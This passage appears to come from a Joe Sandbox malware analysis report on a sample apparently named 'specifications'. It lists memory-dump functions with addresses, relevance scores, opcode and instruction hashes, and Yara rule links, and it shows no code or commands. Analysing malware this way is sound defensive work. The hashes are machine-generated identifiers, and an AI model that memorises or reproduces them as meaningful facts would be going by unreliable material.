                                                                                                                                                                                  • Instruction ID: d41d98600419774b7bf4d19debf573870a4855213bbc4900becd6eb409046358
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
                                                                                                                                                                                  • Instruction Fuzzy Hash: 023190716093118FE3A4DF19C844B1ABBE9FF98710F4449AEF9C497292D770E844CBA1
                                                                                                                                                                                  Function 010BA6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                  • Instruction ID: a8226140fa0247dbd6b1e029d2cc7f9b27a7e95674f9e4983f979c1c0f3a6a46
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7312CB2B04B01EFD765CF69CD81B97BBF8BB08A50F04456DA59AC3650E630E9008B64
                                                                                                                                                                                  Function 0112EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 73ece8232954776279bf2c950b91c134e4a84a611276455a41645c2683195144
                                                                                                                                                                                  • Instruction ID: 077444bc2355851e6ffd1d988a42ce1ef9780d8545303477266447a2632c532b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73ece8232954776279bf2c950b91c134e4a84a611276455a41645c2683195144
                                                                                                                                                                                  • Instruction Fuzzy Hash: F731BAB150A3519FCB19DF5AC54095ABBF1FF89214F0449AEE4889B311D330DA65CF92
                                                                                                                                                                                  Function 010A438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                                                                                                                                                                  • Instruction ID: 995dd74cf919e5fede9b39f6a3c8987365807f804f13c67c2d08df5bf92c4db5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                                                                                                                                                                  • Instruction Fuzzy Hash: A431E236B006059FD724EFF9C980AAEBBFAAB84304F548429D195D7254DB70D941CB90
                                                                                                                                                                                  Function 0107CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                  • Instruction ID: eb0c3beb006a1d94be593c853a0bc7cd32e3cffc0e0b21634df2a8263bfdb11e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB21F536E0025BAADB109BB98810BEFBBB6AF14750F058075AA95E7240E770D90087A4
                                                                                                                                                                                  Function 0107C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                                                                                                                                                                  • Instruction ID: c25a8998828bd6eb9d4dc7fe82b8c30e1a2b98ea95318902cae563b8d515dade
                                                                                                                                                                                  • Opcode Fuzzy Hash: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B3125B15003119BDB65AF68CC40BA97BB4BF54314F9481E9E9C99B382EA34D982CB90
                                                                                                                                                                                  Function 0113C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                  • Instruction ID: 1187b49ac223664e0d07cec27333c941efb36327696cbb45075e45131e26d50f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C212B36600656A6CB19ABA5D800BFABBB4EFC0714F40801BFAD59B691E734D940C7E0
                                                                                                                                                                                  Function 0107E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                                                                                                                                                                  • Instruction ID: 19e6cf070d451f19ffab3e2e2a89e35c628ccb1618179d9e6be2277bdfdb57bf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B31B431E0252C9BDB35DF18CC41FEE77B9AB15740F0101E5E6D5AB290DA74AE808FA4
                                                                                                                                                                                  Function 010B4588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                  • Instruction ID: 5eef5bc2f57ecd7ed9d23eae8ded3c999962229f2a5fea3eda646aeb7c8d8cb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73216D32A00609EBCB15CF58C9C0ADEBBA5FF58714F10806AEE56DB242D671EA058B91
                                                                                                                                                                                  Function 010B44B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                                                                                                                                                                  • Instruction ID: cd12919d312f68e38f752fe69679fce78f6df42e2fbe6b19b1bcf67bd67f92a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0219372604B459BCB21DF58C880BAB77E4FB88760F014559FD959B642D730EE41CBA2
                                                                                                                                                                                  Function 0107E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                  • Instruction ID: d4f17dba35d284c4a093e39ff0f4bd1597589bad0ebd936e8e9b56ba0d7b39d1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D319C31A01605EFD721CFA8C884F6AB7F9EF85354F1045A9E5928B280E730EE02CB50
                                                                                                                                                                                  Function 010FE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4c130a57b56c5edb7de39c7b302fe37acd4877a00a4707270bf2f92b818a282b
                                                                                                                                                                                  • Instruction ID: 2f80e6d1d012851a57f2538822c1989637711bada25797ec943fcc4f0ff6f398
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c130a57b56c5edb7de39c7b302fe37acd4877a00a4707270bf2f92b818a282b
                                                                                                                                                                                  • Instruction Fuzzy Hash: B8319E7960020A9FDB18CF1CC8859AEB7F5EF88344B16445DE9899B7A1E730EA40CB94
                                                                                                                                                                                  Function 011006F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5f91b5847e80fa3c38109a09b9a2d2dc947fea376a8e2e6a975ed957cde7843c
                                                                                                                                                                                  • Instruction ID: 1bfd8f16e433378dcc2187de12161084d78283f3c6a7d8a89c7485706604543d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f91b5847e80fa3c38109a09b9a2d2dc947fea376a8e2e6a975ed957cde7843c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E219E719005299BCF159F59C881ABEB7F4FF48740B40406AF581EB250D778AD41CBA1
                                                                                                                                                                                  Function 0110019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                                                                                                                                                                  • Instruction ID: a017ac0553a06da4845c5a74f83cd59ff4b018f316c64adf0be9259e19dbf783
                                                                                                                                                                                  • Opcode Fuzzy Hash: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821AB71A00645ABDB1ADB68D850FAAB7A8FF48780F14006AF944DB690D774ED40CBA8
                                                                                                                                                                                  Function 01100283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d0bb85cbee00cbc350a42591473d768baa41a875e4257a88de5e2d967ebff167
                                                                                                                                                                                  • Instruction ID: f29009d6821a7e61d15bb25483a0a3d73a89aa241f942d70ec88780fa049078a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0bb85cbee00cbc350a42591473d768baa41a875e4257a88de5e2d967ebff167
                                                                                                                                                                                  • Instruction Fuzzy Hash: C621D671D083459FD717EF69C844B9BBBDCAF94280F080456BD90CB291D7B0D504C7A2
                                                                                                                                                                                  Function 010A2835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 52756926bb867139be6e719aee74352286a489357735988bbc2eef985c362d9e
                                                                                                                                                                                  • Instruction ID: 81ff07aaefc4a09610e16dd5abe6adb649736b61f31bd593e61753ff87a96cbf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 52756926bb867139be6e719aee74352286a489357735988bbc2eef985c362d9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8121073170A682DBE722676C8C18B297BD4AF45774F2903B0FAF19B6D2D769C8018640
                                                                                                                                                                                  Function 010BA30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1f8d2ef757cdaf2b2f1ab9baf6610547472b0eb831696d036c41fbefc846859c
                                                                                                                                                                                  • Instruction ID: 2ac0f15ce2bd427ab416557c25bed399cb798eb73d254dd96d977c017ce4b995
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f8d2ef757cdaf2b2f1ab9baf6610547472b0eb831696d036c41fbefc846859c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 82219A75201B41DBCB29DF29C941B86B7F5AF48B04F14846CA589DBB61E331E842CF94
                                                                                                                                                                                  Function 0113A49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 82cab94901659e0ec0705a36526c2d1ce8016e87a4ed3a5457860598ad68f45a
                                                                                                                                                                                  • Instruction ID: 81daeb0b577741040c1a53311f989a7ca4976df94febadbe3cc59bb6959d97df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82cab94901659e0ec0705a36526c2d1ce8016e87a4ed3a5457860598ad68f45a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51112972380B11BFE72A6659AC01F6B7699DFD4B60F154128BBC8CB2C8EB70DC018795
                                                                                                                                                                                  Function 01100946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 33f8bb63aac43344558d139590bb3bd3513a2a1f941d31c674d638ebc4ef041d
                                                                                                                                                                                  • Instruction ID: 8cce2b33d1137bf2b79bb322c7a71f477b1f2aa1eb43da6e121289e44cdb48f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 33f8bb63aac43344558d139590bb3bd3513a2a1f941d31c674d638ebc4ef041d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A521E9B1E00209ABDB24DFAAD980AAEFBF9FF98710F10012EE415A7350D7B09941CF54
                                                                                                                                                                                  Function 011180A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                  • Instruction ID: d4348fb4f38982b95ac777abc0333d6d63c4e8eddc30989eb90b8fea56b0dcbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                  • Instruction Fuzzy Hash: 20218C72A00209EFDF169F98CC40BAEBBB9EF88310F218429F944A7251D734DD50DB50
                                                                                                                                                                                  Function 010B0124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                  • Instruction ID: d84ef3e60e4f38ee77a5516afbc77bc47c8a5f9b5bb05fca589d3158dce595b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711EF72640605AFEB269F48CC80FDBBBB8EB80754F100429F6809F180D671EE44CB60
                                                                                                                                                                                  Function 01088770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ff89d4fe68d9a5bb035e95e3bc80054407a5ffe68daabef0b93dcf1758c5e42e
                                                                                                                                                                                  • Instruction ID: 62b39c5523b9e915bcb9887a6609d023784650305e9a5849f32fa9b4f06272fb
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff89d4fe68d9a5bb035e95e3bc80054407a5ffe68daabef0b93dcf1758c5e42e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0911B631704611DBEB55EF4DC480A5ABBF5BF46B10B94C0EEEE889F205D6B1D901C790
                                                                                                                                                                                  Function 010880E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cab77846db07bdecf8e51e1c340d035a9e4287a7f55f8e02317b8d0148c6289b
                                                                                                                                                                                  • Instruction ID: d274a55c63a2a14b55fab09d8fb5ec783e4c780ab4987ad8c417290c4badcdbb
                                                                                                                                                                                  • Opcode Fuzzy Hash: cab77846db07bdecf8e51e1c340d035a9e4287a7f55f8e02317b8d0148c6289b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F215E75A04205DFCB14DF58C591AAEBBF9FB88314F6481AED185A7311CB71AD06CB90
                                                                                                                                                                                  Function 010B674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fbec88e8e65dc84c761330a67755f4f18116cede98393de7f38bfc4e12d7641e
                                                                                                                                                                                  • Instruction ID: 98886b815907e545bf8ea2149f41dcf5e2d7ccc66d8158f0aa3beb2a41dd6cb5
                                                                                                                                                                                  • Opcode Fuzzy Hash: fbec88e8e65dc84c761330a67755f4f18116cede98393de7f38bfc4e12d7641e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9219D71600A01EFD7648FA9C881FAAB7F8FF44350F44882DE5EAC7650DB31A840CB60
                                                                                                                                                                                  Function 01116870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 99df100a83a289288119ed9193583a8c471de6280c04e71c196dd22508e2998f
                                                                                                                                                                                  • Instruction ID: d8e96b6a2f1b185c1d24276a417f6b3bc8e290e985d31d527e3f4a16d40e6440
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99df100a83a289288119ed9193583a8c471de6280c04e71c196dd22508e2998f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3811C132240618EFC72ACB5DCD40F9AB7A9EB59750F014035F645DB264EBB2E801CB90
                                                                                                                                                                                  Function 010AE8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f8c34f03cf94185c999eb3e4fe924b959a910bc71a3dd39e39d9d53b6595e12d
                                                                                                                                                                                  • Instruction ID: 5dc469aebcf17833ee24b50337048c84fd8ded632a5c811966d597d28106da38
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8c34f03cf94185c999eb3e4fe924b959a910bc71a3dd39e39d9d53b6595e12d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D11148333045159FCF19DB29CD95A6FB2A7EBD52B0B248568D963CB380EA308802C390
                                                                                                                                                                                  Function 010B66B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 281fd1dbb15aa75c3b4c2d0f68cae4b65e7c0591fabdad765cccb4bb1732bac4
                                                                                                                                                                                  • Instruction ID: dfc25def521633706a51e25c139345256bd4de20697ec3a53f1bed13eb4e8bb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 281fd1dbb15aa75c3b4c2d0f68cae4b65e7c0591fabdad765cccb4bb1732bac4
